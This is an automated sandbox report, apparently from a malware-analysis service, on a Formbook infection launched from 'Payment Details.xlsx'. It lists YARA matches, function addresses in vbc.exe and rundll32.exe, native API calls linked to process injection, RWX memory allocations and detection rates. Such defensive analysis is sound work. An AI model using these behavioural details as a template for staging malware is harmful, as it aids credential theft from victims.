          Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0008A2A94_2_0008A2A9
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F59284_2_002F5928
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F59184_2_002F5918
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F5B784_2_002F5B78
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F63E74_2_002F63E7
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F17B04_2_002F17B0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0008A0354_2_0008A035
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0008A2A99_2_0008A2A9
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041E0159_2_0041E015
          Source: C:\Users\Public\vbc.exeCode function: 9_2_004010309_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041D9319_2_0041D931
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041DAC39_2_0041DAC3
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041E4F69_2_0041E4F6
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041E4989_2_0041E498
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00402D879_2_00402D87
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00402D909_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041D5B69_2_0041D5B6
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00409E609_2_00409E60
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041EF569_2_0041EF56
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00402FB09_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ADE0C69_2_00ADE0C6
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ADE2E99_2_00ADE2E9
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B863BF9_2_00B863BF
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B063DB9_2_00B063DB
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AE23059_2_00AE2305
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B2A37B9_2_00B2A37B
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B6443E9_2_00B6443E
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B605E39_2_00B605E3
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AFC5F09_2_00AFC5F0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B265409_2_00B26540
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AE46809_2_00AE4680
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AEE6C19_2_00AEE6C1
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B2A6349_2_00B2A634
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B826229_2_00B82622
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AEC7BC9_2_00AEC7BC
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B0286D9_2_00B0286D
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AEC85C9_2_00AEC85C
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AE29B29_2_00AE29B2
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B8098E9_2_00B8098E
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B749F59_2_00B749F5
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AF69FE9_2_00AF69FE
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B8CBA49_2_00B8CBA4
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B66BCB9_2_00B66BCB
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B82C9C9_2_00B82C9C
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B6AC5E9_2_00B6AC5E
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B10D3B9_2_00B10D3B
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AECD5B9_2_00AECD5B
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B12E2F9_2_00B12E2F
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AFEE4C9_2_00AFEE4C
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B7CFB19_2_00B7CFB1
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B52FDC9_2_00B52FDC
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AF0F3F9_2_00AF0F3F
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B0D0059_2_00B0D005
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B5D06D9_2_00B5D06D
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AE30409_2_00AE3040
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AF905A9_2_00AF905A
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B6D13F9_2_00B6D13F
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B812389_2_00B81238
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ADF3CF9_2_00ADF3CF
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AE73539_2_00AE7353
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AF14899_2_00AF1489
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B154859_2_00B15485
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B1D47D9_2_00B1D47D
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B835DA9_2_00B835DA
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AE351F9_2_00AE351F
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B6579A9_2_00B6579A
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B157C39_2_00B157C3
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B7771D9_2_00B7771D
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B7F8EE9_2_00B7F8EE
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B5F8C49_2_00B5F8C4
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B659559_2_00B65955
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B6394B9_2_00B6394B
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B93A839_2_00B93A83
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B6DBDA9_2_00B6DBDA
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ADFBD79_2_00ADFBD7
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B07B009_2_00B07B00
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B7FDDD9_2_00B7FDDD
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B6BF149_2_00B6BF14
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B0DF7C9_2_00B0DF7C
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0036A0369_2_0036A036
          Source: C:\Users\Public\vbc.exeCode function: 9_2_003610829_2_00361082
          Source: C:\Users\Public\vbc.exeCode function: 9_2_003689129_2_00368912
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0036B2329_2_0036B232
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00365B329_2_00365B32
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00365B309_2_00365B30
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00362D029_2_00362D02
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0036E5CD9_2_0036E5CD
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0008A0359_2_0008A035
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0264123811_2_02641238
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0259E2E911_2_0259E2E9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025A735311_2_025A7353
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025EA37B11_2_025EA37B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025A230511_2_025A2305
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025C63DB11_2_025C63DB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0259F3CF11_2_0259F3CF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025B905A11_2_025B905A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025A304011_2_025A3040
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025CD00511_2_025CD005
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0259E0C611_2_0259E0C6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0264262211_2_02642622
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025AE6C111_2_025AE6C1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025A468011_2_025A4680
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025D57C311_2_025D57C3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025AC7BC11_2_025AC7BC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0262579A11_2_0262579A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025DD47D11_2_025DD47D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025B148911_2_025B1489
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025D548511_2_025D5485
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025E654011_2_025E6540
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025A351F11_2_025A351F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025BC5F011_2_025BC5F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_02653A8311_2_02653A83
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025C7B0011_2_025C7B00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0259FBD711_2_0259FBD7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0262DBDA11_2_0262DBDA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0264CBA411_2_0264CBA4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025AC85C11_2_025AC85C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025C286D11_2_025C286D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0263F8EE11_2_0263F8EE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0262595511_2_02625955
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025B69FE11_2_025B69FE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025A29B211_2_025A29B2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0264098E11_2_0264098E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025BEE4C11_2_025BEE4C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025D2E2F11_2_025D2E2F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025CDF7C11_2_025CDF7C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025B0F3F11_2_025B0F3F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025ACD5B11_2_025ACD5B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025D0D3B11_2_025D0D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0263FDDD11_2_0263FDDD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AD5B611_2_000AD5B6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AD93111_2_000AD931
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000ADAC311_2_000ADAC3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00092D8711_2_00092D87
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00092D9011_2_00092D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00099E6011_2_00099E60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00092FB011_2_00092FB0
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B23F92 appears 132 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00ADE2A8 appears 60 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00ADDF5C appears 130 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B2373B appears 253 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B4F970 appears 84 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0260F970 appears 81 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0259DF5C appears 118 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0259E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 025E3F92 appears 108 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 025E373B appears 238 times
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A370 NtCreateFile,9_2_0041A370
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A420 NtReadFile,9_2_0041A420
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A4A0 NtClose,9_2_0041A4A0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A550 NtAllocateVirtualMemory,9_2_0041A550
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A36B NtCreateFile,9_2_0041A36B
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A41A NtReadFile,9_2_0041A41A
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A49C NtClose,9_2_0041A49C
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD00C4 NtCreateFile,LdrInitializeThunk,9_2_00AD00C4
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD0078 NtResumeThread,LdrInitializeThunk,9_2_00AD0078
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD0048 NtProtectVirtualMemory,LdrInitializeThunk,9_2_00AD0048
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACF9F0 NtClose,LdrInitializeThunk,9_2_00ACF9F0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACF900 NtReadFile,LdrInitializeThunk,9_2_00ACF900
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_00ACFAE8
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_00ACFAD0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFBB8 NtQueryInformationToken,LdrInitializeThunk,9_2_00ACFBB8
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_00ACFB68
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFC90 NtUnmapViewOfSection,LdrInitializeThunk,9_2_00ACFC90
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFC60 NtMapViewOfSection,LdrInitializeThunk,9_2_00ACFC60
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFD8C NtDelayExecution,LdrInitializeThunk,9_2_00ACFD8C
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_00ACFDC0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFEA0 NtReadVirtualMemory,LdrInitializeThunk,9_2_00ACFEA0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_00ACFED0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFFB4 NtCreateSection,LdrInitializeThunk,9_2_00ACFFB4
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD0060 NtQuerySection,9_2_00AD0060
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD01D4 NtSetValueKey,9_2_00AD01D4
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD010C NtOpenDirectoryObject,9_2_00AD010C
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD07AC NtCreateMutant,9_2_00AD07AC
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD0C40 NtGetContextThread,9_2_00AD0C40
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD10D0 NtOpenProcessToken,9_2_00AD10D0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD1148 NtOpenThread,9_2_00AD1148
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACF8CC NtWaitForSingleObject,9_2_00ACF8CC
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACF938 NtWriteFile,9_2_00ACF938
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD1930 NtSetContextThread,9_2_00AD1930
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFAB8 NtQueryValueKey,9_2_00ACFAB8
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFA20 NtQueryInformationFile,9_2_00ACFA20
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFA50 NtEnumerateValueKey,9_2_00ACFA50
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFBE8 NtQueryVirtualMemory,9_2_00ACFBE8
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFB50 NtCreateKey,9_2_00ACFB50
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFC30 NtOpenProcess,9_2_00ACFC30
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFC48 NtSetInformationFile,9_2_00ACFC48
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD1D80 NtSuspendThread,9_2_00AD1D80
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFD5C NtEnumerateKey,9_2_00ACFD5C
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFE24 NtWriteVirtualMemory,9_2_00ACFE24
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFFFC NtCreateProcessEx,9_2_00ACFFFC
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFF34 NtQueueApcThread,9_2_00ACFF34
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0036A036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,9_2_0036A036
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0036A042 NtQueryInformationProcess,9_2_0036A042
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025900C4 NtCreateFile,LdrInitializeThunk,11_2_025900C4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025907AC NtCreateMutant,LdrInitializeThunk,11_2_025907AC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_0258FAD0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FAE8 NtQueryInformationProcess,LdrInitializeThunk,11_2_0258FAE8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FAB8 NtQueryValueKey,LdrInitializeThunk,11_2_0258FAB8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FB50 NtCreateKey,LdrInitializeThunk,11_2_0258FB50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FB68 NtFreeVirtualMemory,LdrInitializeThunk,11_2_0258FB68
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FBB8 NtQueryInformationToken,LdrInitializeThunk,11_2_0258FBB8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258F900 NtReadFile,LdrInitializeThunk,11_2_0258F900
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258F9F0 NtClose,LdrInitializeThunk,11_2_0258F9F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_0258FED0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FFB4 NtCreateSection,LdrInitializeThunk,11_2_0258FFB4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FC60 NtMapViewOfSection,LdrInitializeThunk,11_2_0258FC60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FDC0 NtQuerySystemInformation,LdrInitializeThunk,11_2_0258FDC0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FD8C NtDelayExecution,LdrInitializeThunk,11_2_0258FD8C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_02590048 NtProtectVirtualMemory,11_2_02590048
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_02590078 NtResumeThread,11_2_02590078
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_02590060 NtQuerySection,11_2_02590060
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025910D0 NtOpenProcessToken,11_2_025910D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_02591148 NtOpenThread,11_2_02591148
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0259010C NtOpenDirectoryObject,11_2_0259010C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025901D4 NtSetValueKey,11_2_025901D4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FA50 NtEnumerateValueKey,11_2_0258FA50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FA20 NtQueryInformationFile,11_2_0258FA20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FBE8 NtQueryVirtualMemory,11_2_0258FBE8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258F8CC NtWaitForSingleObject,11_2_0258F8CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258F938 NtWriteFile,11_2_0258F938
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_02591930 NtSetContextThread,11_2_02591930
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FE24 NtWriteVirtualMemory,11_2_0258FE24
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FEA0 NtReadVirtualMemory,11_2_0258FEA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FF34 NtQueueApcThread,11_2_0258FF34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FFFC NtCreateProcessEx,11_2_0258FFFC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FC48 NtSetInformationFile,11_2_0258FC48
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_02590C40 NtGetContextThread,11_2_02590C40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FC30 NtOpenProcess,11_2_0258FC30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FC90 NtUnmapViewOfSection,11_2_0258FC90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FD5C NtEnumerateKey,11_2_0258FD5C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_02591D80 NtSuspendThread,11_2_02591D80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AA370 NtCreateFile,11_2_000AA370
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AA420 NtReadFile,11_2_000AA420
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AA4A0 NtClose,11_2_000AA4A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AA550 NtAllocateVirtualMemory,11_2_000AA550
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AA36B NtCreateFile,11_2_000AA36B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AA41A NtReadFile,11_2_000AA41A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AA49C NtClose,11_2_000AA49C
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: vbc[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: OmnbtuhFsJys.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Payment Details.xlsxVirustotal: Detection: 36%
          Source: Payment Details.xlsxReversingLabs: Detection: 33%
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......x...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................................................0......./.......................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................................................0......./.......x...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............................<.......................0.......;...............|.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............................W.......................0.......;.......x...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......x.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................................................0.......G.......x...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......x...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......s.J.y.s...e.x.e.................................................0......._.......x...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............................:.......................0......._.......x...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................q.......................0.......k.......................................Jump to behavior
